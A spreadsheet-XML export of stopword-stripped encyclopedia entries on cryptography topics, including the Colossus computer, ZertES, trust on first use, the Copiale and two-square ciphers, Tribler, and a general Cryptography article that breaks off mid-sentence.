(colossus 1500 valves, became operational dollis hill december 1943 bletchley park february 1944. this processed message 5000 characters second using impulse reading tape's sprocket holes clock signal. quickly became evident huge leap forward cryptanalysis tunny. further colossus machines ordered orders robinsons cancelled. improved mark colossus (colossus contained 2400 valves first worked bletchley park june 1944, time d-day normandy landings. main parts machine were: tape transport reading mechanism (the "bedstead") message tape loop 5000 characters second; unit generated stream electronically; five parallel processing units could programmed perform large range boolean operations; five counting units counted number exceeded pre-set total, printed out.the five parallel processing units allowed tutte's "1+2 break functions effective speed 25,000 characters second circuitry invented flowers would called shift register. donald michie worked method using colossus assist wheel breaking well wheel setting. this implemented special hardware later colossi. total colossus computers eleventh commissioned europe (ve-day). special machines well commercially produced teleprinters re-perforators, number machines built assist preparation checking tapes newmanry testery. approximate complement 1945 follows. steps wheel setting working start position wheels required first settings determined "wheel breaking". initially, achieved messages sent depth. number start positions first wheels, 41×31 1271. first step start positions message tape. this tutte's "1+2 break involved computing (∆z1 ∆χ2)—which gives putative (∆d1 ∆d2)—and counting number times gave incorrect starting positions would, average, give count message length. average, count correct starting point would 54%, inevitably considerable spread values around averages.both heath robinson, developed became known "old robinson", colossus designed automate process. statistical theory allowed derivation measures count expected incorrect starting point wheels. this measure deviation randomness called sigma. starting points gave count less sigma, named "set total", printed out. ideal single pair trial values produced outstanding value sigma thus identifying start positions first wheels. example output mark colossus five counters: given below. with average-sized message, would take eight minutes. however, utilising parallelism mark colossus, number times message read could reduced factor five, 1271 255. having identified possible start positions, next step find start positions wheels. example given above, single setting whose sigma value makes stand rest. this always case, small enumerates different runs might tried according result run. first choices iterative process made cryptanalyst sitting typewriter output, calling instructions wren operators. newman devised decision tree jack good donald michie task devising others. these used wrens without recourse cryptanalysts certain criteria met.in small's examples, next first wheels start positions found three separate parallel explorations remaining three wheels. such called "short run" took minutes. probable start positions wheels are: these verified de-chi message passed testery. this involved colossus performing count frequency characters small describes check frequency count characters "acid test", practically every cryptanalyst wren newmanry testery knew contents following table heart. derived start points wheels passed test, de-chi-ed message passed testery manual methods used derive motor settings. small remarked, work newmanry took great amount statistical science, whereas testery took much knowledge language great interest art. cryptanalyst jerry roberts made point testery work greater load staff automated processes newmanry. also national museum computing notes references bibliography</t>
  </si>
  <si>
    <t>ZertES</t>
  </si>
  <si>
    <t>zertes swiss federal regulates conditions trust service providers certification services electronic signatures. additionally, provides framework outlines provider’s obligations rights apply providing certification services. description zertes approved december 2003. promotes secure services electronic certification facilitate qualified electronic signatures. under law, signatures would equal handwritten signature.switzerland’s zertes possesses similar tiered structure standards legal value european union’s eidas regulation. zertes provides several assurance levels; qualified electronic signatures highest level, equivalent handwritten signature. many official documents, required electronic signatures used qualified electronic signature level. standards under zertes, electronic signature refers electronic data either attached associated electronic data, serves means authentication data. currently, zertes provide specifications electronic signatures technically implemented. despite limitation, swiss federal council made international agreements facilitate international electronic signatures allow legal recognition. therefore, council allows electronic signatures technically implemented digital standards eidas accepted.the following standards recognized swiss federal council: xades pades cades electronic transactions fortgeschrittene elektronische signatur, also known advanced electronic signature, must meet certain requirements order prove authenticity, including: establishing unique link signatory ability identify signatory holder having created software equipment remains sole control signatory capability identifying data document attached altered tampered signedzertes allows enhancement advanced electronic signature legal value adding qualified certificate, similar eidas allows instance. upgraded advanced electronic signature referred qualifizierte elektronische signatur qualified electronic signature. signature must produced secure signature creation device attached qualified certificate. time signature created, certification must valid.zertes requires qualified certificates must provide: serial number identifies qualified certificate name individual holds signature verification signature verification name state issuer certificate established, addition qualified electronic signature issuer, referred anbieterin zertifizierungsdiensten, addition national foreign accreditation body accredited issuer time certificate valid proof recognition certificate service provider provides certification services transaction information certificate usedcertificate service providers issue qualified certificates required undergo audits performed conformity assessment body appointed schweizerische akkreditierungsstelle.under zertes, swiss federal council regulates signature generation issues signaturprüfschlüssel (signature verification keys) qualified certificates. secure signature creative device must verify signature used unique secrecy reasonably assured protected counterfeited under sole control signatorythe signature verification process ensure that: data used verify signature corresponds data sent verifier signature reliably verified verification result displayed correctly needed, verifier able determine contents signed data clearly identified pseudonym used tampering occurred, detected signature owner’s identity properly displayedzertes requires qualified trust service providers meet requirements ensure validity certificates issue electronic signatures. providers naturalized legal citizens. under certain circumstances, foreign suppliers permitted provide certification services. legal implications zertes similar eidas assuring legal bindingness electronic signatures tiered approach legal value court qualified electronic signatures higher probative value advanced electronic signatures. cross-border communications switzerland member state european union occur daily basis, country home many internationally active banks companies. therefore, zertes eidas comparable technical design carry similar legal implications. references</t>
  </si>
  <si>
    <t>Trust on first use</t>
  </si>
  <si>
    <t>trust first (tofu), trust upon first (tufu), authentication scheme used client software needs establish trust relationship unknown not-yet-trusted endpoint. tofu model, client look endpoint's identifier, usually either public identity endpoint, fingerprint said identity key, local trust database. identifier exists endpoint, client software either prompt user confirm verified purported identifier authentic, manual verification assumed possible protocol, client simply trust identifier given record trust relationship trust database. subsequent connection different identifier received opposing endpoint, client software consider untrusted. tofu implementations protocol, client software (though all) will, upon connecting not-yet-trusted server, display server's public fingerprint, prompt user verify indeed authenticated using authenticated channel. client record trust relationship trust database. identifier cause blocking warning requires manual removal currently stored identifier. http public pinning browsers always accept first public returned server http strict transport security browsers obey redirection rule duration 'age' directive. xmpp client conversations uses blind trust before verification, identifiers blindly trusted user demonstrates ability authenticate endpoints scanning qr-code representation identifier. after first identifier scanned, client display shield symbol messages authenticated endpoints, background others. signal endpoints initially blindly trust identifier display non-blocking warnings changes. identifier verified either scanning qr-code, exchanging decimal representation identifier (called safety number) authenticated channel. identifier marked verified. this changes nature identifier change warnings non-blocking blocking.in e.g. jami ricochet identifier user's call-sign itself. exchanged channel, identifier verified authenticated channel, effectively blindly trusted. identifier change also requires account change, thus mitm attack account requires access endpoint's private key. whatsapp endpoint initially blindly trusts identifier, default warning displayed identifier changes. user demonstrates ability authenticate endpoints accessing fingerprint (called security code), client prompt user enable non-blocking warnings identifier changes. whatsapp client allow user mark identifier verified. telegram's optional secret chats endpoints blindly trust identifier. changed identifier spawns secret chat window instead displaying warning. identifiers verified comparing visual hexadecimal representation identifier. telegram client allow user mark identifier verified. keybase clients cross-sign other's keys, means trusting single identifier allows verification multiple identifiers. keybase acts trusted third party verifies link keybase account account's signature chain contains identifier history. identifier used keybase either hash root user's signature chain, keybase account name tied until user verifies authenticity signature chain's root hash keybase account) authenticated channel, account associated identifiers essentially blindly trusted, user susceptible mitm attack. model strengths weaknesses single largest strength tofu-style model human must initially validate every interaction. common application model ssh-rpc 'bot' users computers, whereby public keys distributed computers automated access centralized hosts. tofu aspect application forces sysadmin trusted user) validate remote server's identity upon first connection. end-to-end encrypted communication tofu model allows authenticated encryption without complex procedure obtaining personal certificate vulnerable compromise. compared trust, tofu less maintenance overhead. largest weakness tofu requires manual verification inability scale large groups computer networks. maintenance overhead keeping track identifiers every endpoint quickly scale beyond capabilities users. environments authenticity identifier verified easily enough (for example, staff workplace educational facility might hard reach), users tend blindly trust identifier opposing endpoint. accidentally approved identifiers attackers also hard detect man-in-the-middle attack persists. endpoint always involves identifier, warning potential attack displayed. this caused misconception among users safe proceed without verifying authenticity initial identifier, regardless whether identifier presented user not. warning fatigue pushed many messaging applications remove blocking warnings prevent users reverting less secure applications feature end-to-end encryption first place. out-of-sight identifier verification mechanisms reduce likelihood secure authentication practices discovered adopted users. first known term first known formal term tofu tufu researchers wendlandt, david andersen, adrian perrig research paper "perspectives: improving ssh-style host authentication with multi-path probing" published 2008 usenix annual technical conference.moxie marlinspike mentioned perspectives term tofu proceedings, reference comments made kaminsky, panel discussion open letter, call action". audience suggestion raised implying superiority public infrastructure (pki) model, ssl/tls model whereby moxie replied: anonymous: "...so, dislike certificate model (tls) pki, like, say, pki, seems work fairly well, basically fundamental thing give data someone, trust data. remembering certificate. someone else comes different certificate, signed different authority, still trust them. way, would solve problems- would solve problems rogue cas, extent, help initial bootstrapping initial bootstrapping would initial model, continued interaction site would model would allow continued strength beyond now. model continued re-used, initial acceptance. this?" dan: "so, former developer, walk quickly, every time there's error generation, user asked, 'please type trusting key', 'please known hosts file delete value', every last time always fault server misconfiguration. model cool, scale". moxie: "and would add, talking called 'trust first use', 'tofu', there's project involved called perspectives, tries leverage less confusing pure model, think really great project check interested alternatives system." related work subject work toward creating visual representations server certificate 'fingerprint' hashes implemented openssh form ascii art. intention users visually recognize 'graphical' image, instead long string letters numbers. original research paper written adrian perrig dawn song, carnegie mellon university computer science department. originator 'tufu' acronym describing inspiration 'perspectives firefox plug in', designed strengthen ssl/tls model contacting network notaries whenever browser connects https website prior work topics trust, validation, non-repudiation fundamental work field cryptography digital security. also list information technology acronyms man-in-the-middle attack references external links "def schedule, open letter call action" firefox extension contacts network notaries whenever browser connects https website hash visualization openssh</t>
  </si>
  <si>
    <t>Cover (telecommunications)</t>
  </si>
  <si>
    <t>telecommunications tradecraft, cover technique concealing altering characteristics communications patterns purpose denying unauthorized receiver information would value. purpose cover make communication secure, make look like noise, rendering uninteresting worth analysis. even attacker recognizes communication interesting, cover makes traffic analysis difficult since must crack cover find addressed. usually, covered communication also encrypted. way, enemies idea sent message; friends know sent message, know said; intended recipient knows said. technically, cover sometimes refers specific process modulo addition pseudorandom stream generated cryptographic device bits control message. source: federal standard 1037c mil-std-188</t>
  </si>
  <si>
    <t>Cryptanalytic computer</t>
  </si>
  <si>
    <t>cryptanalytic computer computer designed used cryptanalysis, nowadays involves massive statistical analysis multiple trial decryptions since world possible automated equipment. polish cryptanalysts designed built automated aids work enigma traffic. arguably, first modern computer (digital, electronic, somewhat programmable) built cryptanalytic work bletchley park (the colossus) war. more modern computers important world machines (like cray-1) reported machine instructions hardwired request nsa. computers continue important cryptanalysis well 21st century. nsa, fact, said largest number installed computers planet. whether true google computer farms doubtful remains publicly unknown. also bomba (cryptography) bombe colossus computer deep crack frostburg 7950 harvest</t>
  </si>
  <si>
    <t>Copying</t>
  </si>
  <si>
    <t>copying duplication information artifact based instance information artifact, using process originally generated with analog forms information, copying possible limited degree accuracy, depends quality equipment used skill operator. there inevitable generation loss, deterioration accumulation "noise" (random small changes) original copy copies made. this deterioration accumulates generation. with digital forms information, copying perfect. copy paste frequently used computer user select copy area text content. español méxico most high-accuracy copying techniques principle type possible interpretation reading data possible write interpretation data data classes. visual art, copying works masters standard students learn paint sculpt. often, artists term credit original artist title copy (regardless similar works appear) vincent gogh's "first steps (after millet)" pablo picasso's "luncheon grass, manet" (based manet's well-known work). sculpture, copies often made using devices pointing machine, pantograph recently, computer guided router systems scan model produce variety materials desired size. another copying three-dimensional works lost-wax casting forms molding casting. literature prior invention printing press, obtain copy book copy hand (see scrivener). throughout middle ages, monks copied entire texts disseminating preserving literary, philosophical religious texts. office work offices need copy document number situations. they usually need copy outgoing correspondence records. sometimes want circulate copies documents create several interested parties. until late 18th century, office wanted keep copy outgoing letter, clerk write copy hand. this technology continued prevalent 19th century. purposes, offices employed copy clerks, also known copyists, scribes, scriveners. alternatives hand copying invented mid-17th century late 18th century, none significant impact offices. 1780 james watt obtained patent letter copying presses, james watt produced beginning year. letter copying presses used early 1780s people like benjamin franklin, george washington, thomas jefferson. 1785, jefferson using stationary portable presses made james watt during 19th century, host competing technologies introduced meet office copying needs. technologies commonly used 1895 identified 1895 description york business college's course program: "all important letters documents copied letter-book carbon copies [are] made, instruction also given mimeograph labor-saving office devices." biological copying organically, copying genetic information take place using replication, able copy replicate data high degree accuracy, mistakes common, occur form mutations. however, process repair, many mistakes corrected checking copied data original data. digital copying principle applied digitally, devices hard disks, different form. magnetised data disk consists unlike dna, types information, rather four types, however, still polar concept transfer. case, read-write head acts intermediary. data section reading "1", trigger type response, other. these responses reading converted electrical form gets carried circuits. although later converted processed ways using data, modified, file copied hard disk another, principle ensures data transferred high fidelity, type signal trigger type data write, case, this excludes exceptions data written incorrectly existing data corrupted disk distinction made, usually hard disk returns area unreadable. concept using digital copying website copy, digital copying interpretation basic concept disk read write itself. digital copy sample interpretation digital copying. copying rights concept copying particular significance certain areas law. primary areas intellectual property law, number cases refined question exactly constitutes kind copying prohibited law, especially areas copyright law. related concept plagiarism, copying others' work passing one's own. many schools take plagiarism academic suspension, even failure course. also copier copyscript duplicating machines fauxbergé replica typescript references external links dataduplication copying theft</t>
  </si>
  <si>
    <t>Trojan script</t>
  </si>
  <si>
    <t>trojan script series signs unknown origin found vessels troy excavated heinrich schliemann's expedition. their status disputed. analysis soviet historian antiquity nikolay kazansky found much similar linear signs, another soviet historian, arkady molchanov, regarded "imitation writing". inscriptions inscription 2444, compared linear linear signs, read: ku?-to-a-ro-ka-ro-ju??-?-ro-tu inscription 2445 illegible seems partly deteriorated; several signs identified fragments linear linear signs whole signs. also cypro-minoan syllabary trojan language teucer undeciphered writing systems references sources</t>
  </si>
  <si>
    <t>Copiale cipher</t>
  </si>
  <si>
    <t>copiale cipher encrypted manuscript consisting 75,000 handwritten characters filling pages bound volume. undeciphered years, document cracked 2011 help modern computer techniques. international team consisting kevin knight university southern california information sciences institute viterbi school engineering, along beáta megyesi christiane schaefer uppsala university sweden, found cipher encrypted german text. manuscript homophonic cipher uses complex substitution code, including symbols letters, text spaces.previously examined scientists german academy sciences berlin 1970s, cipher thought date 1760 1780. decipherment revealed document created 1730s secret society called "high enlightened (hocherleuchtete) oculist order" wolfenbüttel, oculists. oculists used sight metaphor knowledge.a parallel manuscript kept staatsarchiv wolfenbüttel.the copiale cipher includes abstract symbols, well letters greek roman alphabet. plain text book "copiales "philipp 1866" flyleaf. philipp thought owner manuscript. plain-text letters message found encoded accented roman letters, greek letters symbols, unaccented roman letters serving represent spaces. researchers found initial pages describe oculist initiation ceremony. manuscript portrays, among things, initiation ritual candidate asked read blank piece paper and, confessing inability given eyeglasses asked again, washing eyes cloth, followed "operation" single eyebrow hair plucked. substitution cipher copiale cipher substitution cipher. 1-for-1 substitution rather homophonic cipher: ciphertext character stands particular plaintext character, several ciphertext characters encode plaintext character. example, unaccented roman characters encode space. seven ciphertext characters encode single letter "e". addition, ciphertext characters stand several characters even word. ciphertext character ("†") encodes "sch", another encodes secret society's name. decryption method machine translation expert, knight approached language translation languages ciphers, effectively treating foreign words symbols english words. approach, tasked expectation-maximization algorithm generating every possible match foreign english words, enabled algorithm figure words pass. comparison languages confirmed original language likely german, researchers guessed based word "philipp," german spelling. knight used combination intuition computing techniques decipher code weeks. megyesi later realized particular symbol meant "eye", schaefer connected discovery oculists. oculists oculists group ophthalmologists count friedrich august veltheim, died april 1775. philipp 1866 copiales document, however, appears suggest oculists, least count veltheim, group freemasons created oculist society order pass along masonic rites recently banned pope clement xii. also list ciphertexts voynich manuscript references external links knight, megyesi, schaefer, (nov 2012). "the copiale cipher". project. uppsala universitet: beáta megyesi. "deciphered german" (pdf) german). "english translation" (pdf).</t>
  </si>
  <si>
    <t>Cryptographic High Value Product</t>
  </si>
  <si>
    <t>cryptographic high value product (chvp) designation used within information security community identify assets high value, used encrypt decrypt secure communications, retain store classified information. when disconnected secure communication network, chvp equipment handled lower level controls required comsec equipment. also comsec multibook references chvp suite</t>
  </si>
  <si>
    <t>Two-square cipher</t>
  </si>
  <si>
    <t>two-square cipher, also called double playfair, manual symmetric encryption technique. developed ease cumbersome nature large encryption/decryption matrix used four-square cipher still slightly stronger single-square playfair cipher. technique encrypts pairs letters (digraphs), thus falls category ciphers known polygraphic substitution ciphers. this adds significant strength encryption compared monographic substitution ciphers, operate single characters. digraphs makes two-square technique less susceptible frequency analysis attacks, analysis must done possible digraphs rather monographic substitution. frequency analysis digraphs possible, considerably difficult, generally requires much larger ciphertext order useful. history félix delastelle described cipher 1901 book traité élémentaire cryptographie name damiers bigrammatiques réduits (reduced digraphic checkerboard), horizontal vertical types.the two-alphabet checkerboard described william friedman book advanced military cryptography (1931) later military cryptanalysis military cryptanalytics series.friedman's co-author military cryptanalytics, lambros callimahos described cipher collier's encyclopedia cryptography article.the encyclopedia description adapted article cryptogram american cryptogram association 1972. after this, cipher became regular cipher type puzzles.in 1987, noel currer‐briggs described double playfair cipher used germans world case, double playfair refers method using polybius squares plus seriation. even variants double playfair encipher pair letters twice considered weaker double transposition cipher. middle 1915, germans completely broken british playfair. time recognised flexibility simplicity, decided could make secure adapt use. instead using square dividing clear text bigrams described, used squares wrote whole message key-lengths specially prepared squared message forms arranged double lines given length. other slight variants, also incorporating seriation, described schick (1987) david (1996).the two-square cipher described 20th century popular cryptography books e.g. helen fouché gaines (1939) william maxwell bowers (1959), although describe playfair cipher four-square cipher. using two-square two-square cipher uses matrices comes varieties, horizontal vertical. horizontal two-square matrices side side. vertical two-square other. each matrices contains letters alphabet (usually omitting putting location reduce alphabet fit). alphabets squares generally mixed alphabets, based keyword phrase. generate matrices, would first fill spaces matrix letters keyword phrase (dropping duplicate letters), fill remaining spaces rest letters alphabet order (again omitting reduce alphabet fit). written rows table, left right, pattern, spiral beginning upper-left-hand corner ending center. keyword together conventions filling table constitute cipher key. two-square algorithm allows separate keys, matrix. example, vertical two-square matrices keywords "example" "keyword": algorithm encryption using two-square basically system used four-square, except plaintext ciphertext digraphs matrixes. encrypt message, would follow steps: split payload message digraphs. (help kenobi becomes vertical two-square, first character plaintext ciphertext digraphs uses matrix, second character uses bottom. horizontal two-square, first character digraphs uses left matrix, second character uses right. find first letter digraph upper/left text matrix.e find second letter digraph lower/right plaintext matrix.e rectangle defined plaintext characters opposite corners define ciphertext digraph.e using vertical two-square example given above, encrypt following plaintext: plaintext: ciphertext: here two-square written blanking values used encrypting digraph "lp" "dl" rectangle rule used encrypt decrypt seen clearly diagram. method decrypting identical method encryption. just like playfair (and unlike four-square), special circumstances letters digraph column vertical two-square horizontal two-square. vertical two-square, plaintext digraph ends characters column gives digraph ciphertext. horizontal two-square, plaintext digraph characters gives convention) digraph characters reversed ciphertext. cryptography referred transparency. (the horizontal version sometimes called reverse transparency.) notice example digraphs "he" "an" mapped themselves. weakness two-square digraphs transparencies. two-square cryptanalysis like pre-modern ciphers, two-square cipher easily cracked enough text. obtaining relatively straightforward plaintext ciphertext known. when ciphertext known, brute force cryptanalysis cipher involves searching space matches frequency occurrence digraphs (pairs letters) known frequency occurrence digraphs assumed language original message. cryptanalysis two-square almost always revolves around transparency weakness. depending whether vertical horizontal two-square used, either ciphertext reverse ciphertext show significant number plaintext fragments. large enough ciphertext sample, likely several transparent digraphs row, revealing possible word fragments. from word fragments analyst generate candidate plaintext strings work backwards keyword. good tutorial reconstructing two-square cipher found chapter "solution polygraphic substitution systems," field manual 34-40-2, produced united states army. references also topics cryptography playfair cipher</t>
  </si>
  <si>
    <t>Tribler</t>
  </si>
  <si>
    <t>tribler open source decentralized bittorrent client allows anonymous peer-to-peer default. tribler based bittorrent protocol uses overlay network content searching. overlay network, tribler require external website indexing service discover content. user interface tribler basic focused ease instead diversity features. tribler available linux, windows, x.tribler trials video streamer known swarmplayer. history name tribler stems word tribe, referring usage social networks client. first version tribler enhancement another bittorrent client. 2009, development team behind tribler stated efforts coming years focused integration tribler television hardware.in 2014, release version 6.3.1, custom built-in onion routing network introduced part tribler. users load clearnet torrent, leaving anonymity ticked, files routed tribler. because custom onion network exit nodes, enhanced make every tribler user function relay. features tribler adds keyword search ability bittorrent file download protocol using gossip protocol, somewhat similar exeem network shut 2005. software includes ability recommend content. after dozen downloads tribler software roughly estimate download taste user recommends content. this feature based collaborative filtering, also featured websites last.fm amazon.com. another feature tribler limited form social networking donation upload capacity. tribler borrows bandwidth capacity connected nodes regarded helpful boost download speed files. swarmplayer swarmplayer python-based bittorrent internet viewer. allows watch bittorrent-hosted peer-to-peer digital media distribution video demand plays live tribler streaming media. based core tribler application. core software free open source software based tribler platform, licensed lgpl 2.1. development tribler created university researchers delft university technology, trying improve peer-to-peer technology. tribler designed enhance bittorrent removing need central elements websites finding content, well anonymous. european union's p2p-next project develop internet television distribution standard builds tribler technology. reception after news article torrentfreak february 2012 mentioned tribler's decentralization fact index impossible take down, website became hugely popular, causing reduced download page satisfy demand. warning tribler security appeared tor-dev mailing list dec. 2014 addressed shortly thereafter github. also comparison bittorrent clients references further reading "truly decentralized bittorrent downloading finally arrived". torrentfreak. external links official website</t>
  </si>
  <si>
    <t>Cryptographic Quarterly</t>
  </si>
  <si>
    <t>cryptographic quarterly internal, classified journal u.s. national security agency (nsa). 2003, michael ravnitzky submitted freedom information (foia) request index articles published cryptographic quarterly journal. three years later 2006, declassified number articles 1980s 1990s. number declassified documents made publicly available. external links nsa's declassified initiative schneier's blog matt blaze's exhaustive search blog bibliographies provided thememoryhole.org</t>
  </si>
  <si>
    <t>Cryptographic attack</t>
  </si>
  <si>
    <t>Cryptographie indéchiffrable</t>
  </si>
  <si>
    <t>cryptographie indéchiffrable (subtitle: basée nouvelles combinaisons rationelles) french book cryptography written émile victor théodore myszkowski retired french colonel) published 1902. book described cipher author invented claimed (incorrectly) "undecipherable" (i.e. secure unauthorised attempts read it). based form repeated-key transposition. also books cryptography transposition cipher</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t xml:space="preserve">cryptography, cryptology (from ancient greek: κρυπτός, romanized: kryptós "hidden, secret"; γράφειν graphein, write", -λογία -logia, "study", respectively), practice study techniques secure communication presence adversarial behavior. more generally, cryptography constructing analyzing protocols prevent third parties public reading private messages; various aspects information security data confidentiality, data integrity, authentication, non-repudiation central modern cryptography. modern cryptography exists intersection disciplines mathematics, computer science, electrical engineering, communication science, physics. applications cryptography include electronic commerce, chip-based payment cards, digital currencies, computer passwords, military communications. cryptography prior modern effectively synonymous encryption, converting information readable state unintelligible nonsense. sender encrypted message shares decoding technique intended recipients preclude access adversaries. cryptography literature often uses names alice ("a") sender, ("b") intended recipient, ("eavesdropper") adversary. since development rotor cipher machines world advent computers world cryptography methods become increasingly complex applications varied. modern cryptography heavily based mathematical theory computer science practice; cryptographic algorithms designed around computational hardness assumptions, making algorithms hard break actual practice adversary. while theoretically possible break well-designed system, infeasible actual practice such schemes, well designed, therefore termed "computationally secure"; theoretical advances (e.g., improvements integer factorization algorithms) faster computing technology require designs continually reevaluated, necessary, adapted. information-theoretically secure schemes provably cannot broken even unlimited computing power, one-time pad, much difficult practice best theoretically breakable, computationally secure, schemes. growth cryptographic technology raised number legal issues information age. cryptography's potential tool espionage sedition many governments classify weapon limit even prohibit export. jurisdictions cryptography legal, laws permit investigators compel disclosure encryption keys documents relevant investigation. cryptography also plays major role digital rights management copyright infringement disputes regard digital media. terminology first term "cryptograph" opposed "cryptogram") dates back 19th century—originating "the gold-bug," story edgar allan poe.until modern times, cryptography referred almost exclusively "encryption", process converting ordinary information (called plaintext) unintelligible form (called ciphertext). decryption reverse, words, moving unintelligible ciphertext back plaintext. cipher cypher) pair algorithms carry encryption reversing decryption. detailed operation cipher controlled algorithm and, instance, "key". secret (ideally known communicants), usually string characters (ideally short remembered user), needed decrypt ciphertext. formal mathematical terms, "cryptosystem" ordered list elements finite possible plaintexts, finite possible cyphertexts, finite possible keys, encryption decryption algorithms correspond key. keys important formally actual practice, ciphers without variable keys trivially broken knowledge cipher used therefore useless even counter-productive) purposes. historically, ciphers often used directly encryption decryption without additional procedures authentication integrity checks. there main types cryptosystems: symmetric asymmetric. symmetric systems, ones known 1970s, secret encrypts decrypts message. data manipulation symmetric systems significantly faster asymmetric systems. asymmetric systems "public key" encrypt message related "private key" decrypt advantage asymmetric systems public freely published, allowing parties establish secure communication without shared secret key. practice, asymmetric systems used first exchange secret key, secure communication proceeds efficient symmetric system using key. examples asymmetric systems include diffie–hellman exchange, (rivest–shamir–adleman), (elliptic curve cryptography), post-quantum cryptography. secure symmetric algorithms include commonly used (advanced encryption standard) replaced older (data encryption standard). insecure symmetric algorithms include children's language tangling schemes latin cant, historical cryptographic schemes, however seriously intended, prior invention one-time early 20th century. colloquial use, term "code" often used mean method encryption concealment meaning. however, cryptography, code specific meaning: replacement unit plaintext (i.e., meaningful word phrase) code word (for example, "wallaby" replaces "attack dawn"). cypher, contrast, scheme changing substituting element level letter, syllable, pair letters, etc.) order produce cyphertext. cryptanalysis term used study methods obtaining meaning encrypted information without access normally required i.e., study "crack" encryption algorithms implementations. some terms "cryptography" "cryptology" interchangeably english, others (including military practice generally) "cryptography" refer specifically practice cryptographic techniques "cryptology" refer combined study cryptography cryptanalysis. english flexible several languages "cryptology" (done cryptologists) always used second sense above. 2828 advises steganography sometimes included cryptology.the study characteristics languages application cryptography cryptology (e.g. frequency data, letter combinations, universal patterns, etc.) called cryptolinguistics. history cryptography cryptanalysis before modern era, cryptography focused message confidentiality (i.e., encryption)—conversion messages comprehensible form incomprehensible back end, rendering unreadable interceptors eavesdroppers without secret knowledge (namely needed decryption message). encryption attempted ensure secrecy communications, spies, military leaders, diplomats. recent decades, field expanded beyond confidentiality concerns include techniques message integrity checking, sender/receiver identity authentication, digital signatures, interactive proofs secure computation, among others. classic cryptography main classical cipher types transposition ciphers, rearrange order letters message (e.g., 'hello world' becomes 'ehlol owrdl' trivially simple rearrangement scheme), substitution ciphers, systematically replace letters groups letters letters groups letters (e.g., 'fly once' becomes 'gmz podf' replacing letter following latin alphabet). simple versions either never offered much confidentiality enterprising opponents. early substitution cipher caesar cipher, letter plaintext replaced letter fixed number positions alphabet. suetonius reports julius caesar used shift three communicate generals. atbash example early hebrew cipher. earliest known cryptography carved ciphertext stone egypt 1900 bce), done amusement literate observers rather concealing information. greeks classical times said known ciphers (e.g., scytale transposition cipher claimed used spartan military). steganography (i.e., hiding even existence message keep confidential) also first developed ancient times. early example, herodotus, message tattooed slave's shaved head concealed regrown hair. more modern examples steganography include invisible ink, microdots, digital watermarks conceal information. india, 2000-year-old kamasutra vātsyāyana speaks different kinds ciphers called kautiliyam mulavediya. kautiliyam, cipher letter substitutions based phonetic relations, vowels becoming consonants. mulavediya, cipher alphabet consists pairing letters using reciprocal ones.in sassanid persia, secret scripts, according muslim author al-nadim: šāh-dabīrīya (literally "king's script") used official correspondence, rāz-saharīya used communicate secret messages countries.david kahn notes codebreakers modern cryptology originated among arabs, first people systematically document cryptanalytic methods. al-khalil (717–786) wrote book cryptographic messages, contains first permutations combinations list possible arabic words without vowels. ciphertexts produced classical cipher (and modern ciphers) reveal statistical information plaintext, information often used break cipher. after discovery frequency analysis, perhaps arab mathematician polymath al-kindi (also known alkindus) century, nearly ciphers could broken informed attacker. such classical ciphers still enjoy popularity today, though mostly puzzles (see cryptogram). al-kindi wrote book cryptography entitled risalah istikhraj al-mu'amma (manuscript deciphering cryptographic messages), described first known frequency analysis cryptanalysis techniques. language letter frequencies offer little help extended historical encryption techniques homophonic cipher tend flatten frequency distribution. ciphers, language letter group n-gram) frequencies provide attack. essentially ciphers remained vulnerable cryptanalysis using frequency analysis technique development polyalphabetic cipher, clearly leon battista alberti around year 1467, though indication already known al-kindi. alberti's innovation different ciphers (i.e., substitution alphabets) various parts message (perhaps successive plaintext letter limit). also invented probably first automatic cipher device, wheel implemented partial realization invention. vigenère cipher, polyalphabetic cipher, encryption uses word, controls letter substitution depending letter word used. mid-19th century charles babbage showed vigenère cipher vulnerable kasiski examination, first published years later friedrich kasiski.although frequency analysis powerful general technique many ciphers, encryption still often effective practice, many would-be cryptanalyst unaware technique. breaking message without using frequency analysis essentially required knowledge cipher used perhaps involved, thus making espionage, bribery, burglary, defection, etc., attractive approaches cryptanalytically uninformed. finally explicitly recognized 19th century secrecy cipher's algorithm sensible practical safeguard message security; fact, realized adequate cryptographic scheme (including ciphers) remain secure even adversary fully understands cipher algorithm itself. security used alone sufficient good cipher maintain confidentiality attack. this fundamental principle first explicitly stated 1883 auguste kerckhoffs generally called kerckhoffs's principle; alternatively bluntly, restated claude shannon, inventor information theory fundamentals theoretical cryptography, shannon's maxim—'the enemy knows system'. different physical devices aids used assist ciphers. earliest scytale ancient greece, supposedly used spartans transposition cipher. medieval times, aids invented cipher grille, also used kind steganography. with invention polyalphabetic ciphers came sophisticated aids alberti's cipher disk, johannes trithemius' tabula recta scheme, thomas jefferson's wheel cypher (not publicly known, reinvented independently bazeries around 1900). many mechanical encryption/decryption devices invented early 20th century, several patented, among rotor machines—famously including enigma machine used german government military late 1920s world ciphers implemented better quality examples machine designs brought substantial increase cryptanalytic difficulty wwi. computer prior early 20th century, cryptography mainly concerned linguistic lexicographic patterns. since emphasis shifted, cryptography makes extensive mathematics, including aspects information theory, computational complexity, statistics, combinatorics, abstract algebra, number theory, finite mathematics generally beginning seminal paper, direction cryptography. cryptography also branch engineering, unusual since deals active, intelligent, malevolent opposition; kinds engineering (e.g., civil chemical engineering) need deal neutral natural forces. there also active research examining relationship cryptographic problems quantum physics. just development digital computers electronics helped cryptanalysis, made possible much complex ciphers. furthermore, computers allowed encryption kind data representable binary format, unlike classical ciphers encrypted written language texts; significant. computer thus supplanted linguistic cryptography, cipher design cryptanalysis. many computer ciphers characterized operation binary sequences (sometimes groups blocks), unlike classical mechanical schemes, generally manipulate traditional characters (i.e., letters digits) directly. however, computers also assisted cryptanalysis, compensated extent increased cipher complexity. nonetheless, good modern ciphers stayed ahead cryptanalysis; typically case quality cipher efficient (i.e., fast requiring resources, memory capability), breaking requires effort many orders magnitude larger, vastly larger required classical cipher, making cryptanalysis inefficient impractical effectively impossible. advent modern cryptography cryptanalysis mechanical devices proved difficult laborious. united kingdom, cryptanalytic efforts bletchley park wwii spurred development efficient means carrying repetitious tasks. this culminated development colossus, world's first fully electronic, digital, programmable computer, assisted decryption ciphers generated german army's lorenz sz40/42 machine. extensive open academic research cryptography relatively recent, beginning mid-1970s. early 1970s personnel designed data encryption standard (des) algorithm became first federal government cryptography standard united states. 1976 whitfield diffie martin hellman published diffie–hellman exchange algorithm. 1977 algorithm published martin gardner's scientific american column. since then, cryptography become widely used tool communications, computer networks, computer security generally. some modern cryptographic techniques keep keys secret certain mathematical problems intractable, integer factorization discrete 